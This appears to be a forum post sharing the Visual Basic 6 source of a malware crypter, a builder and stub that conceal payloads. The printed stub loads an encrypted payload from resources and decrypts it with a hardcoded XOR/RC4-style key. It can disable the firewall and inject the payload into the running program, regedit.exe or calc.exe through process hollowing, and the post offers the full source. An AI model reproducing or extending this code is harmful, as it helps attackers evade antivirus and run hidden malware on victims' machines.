
Infos : Builder / Stub Source written in Vb6
- Iconchanger
- Cloner
- Eof
- Firewall
4 custom injections
Crypter uses RES in Builder and Loadressourcedata in stub
Encryption is a modded rc4
main module stub
Quote
Option Explicit
Sub Main()
Dim RootByte() As Byte, RootOptions As String
RootByte = LoadResData(45, 15) ' File
RootOptions = StrConv(LoadResData(80, 60), vbUnicode) ' Options
Call RootDecrypt(RootByte, "KörperVolumen") ' Cryptkey
If Mid$(RootOptions, 1, 1) = 1 Then Call sDisableWall
If Mid$(RootOptions, 2, 1) = 1 Then Call RootPE(GetFilePath, RootByte) ' thixexe
If Mid$(RootOptions, 3, 1) = 1 Then Call RootPE(Environ("windir") & "\regedit.exe", RootByte) ' regedit
If Mid$(RootOptions, 4, 1) = 1 Then Call RootPE(Environ("windir") & "\Updreg.exe", RootByte) ' updreg
If Mid$(RootOptions, 5, 1) = 1 Then Call RootPE(Environ("windir") & "\system32" & "\calc.exe", RootByte) ' calc
End Sub
Function GetFilePath() As String
Dim Platz(512) As Byte
Call RootInvoke("kernel32", "GetModuleFileNameW", 0, VarPtr(Platz(0)), 512)
GetFilePath = Platz
Encryption
Quote
Public Sub RootDecrypt(ByRef ByteArray() As Byte, ByVal sKey As String)
Const MagicByte As Byte = &HEE
Dim PwdLen As Long
Dim PwdAsc As Byte
Dim i As Long
Dim j As Long
Dim LB As Long
Dim UB As Long
PwdLen = Len(sKey)
LB = LBound(ByteArray)
UB = UBound(ByteArray)
For j = 1 To PwdLen
PwdAsc = Asc(Mid$(sKey, j, 1)) Xor MagicByte
For i = LB To UB Step PwdLen
ByteArray(i) = ByteArray(i) Xor PwdAsc Xor (i And &HEE)
Next i
LB = LB + 1
Next j
End Sub
Full Source attached well documenmted, if there are any questions open pls ask.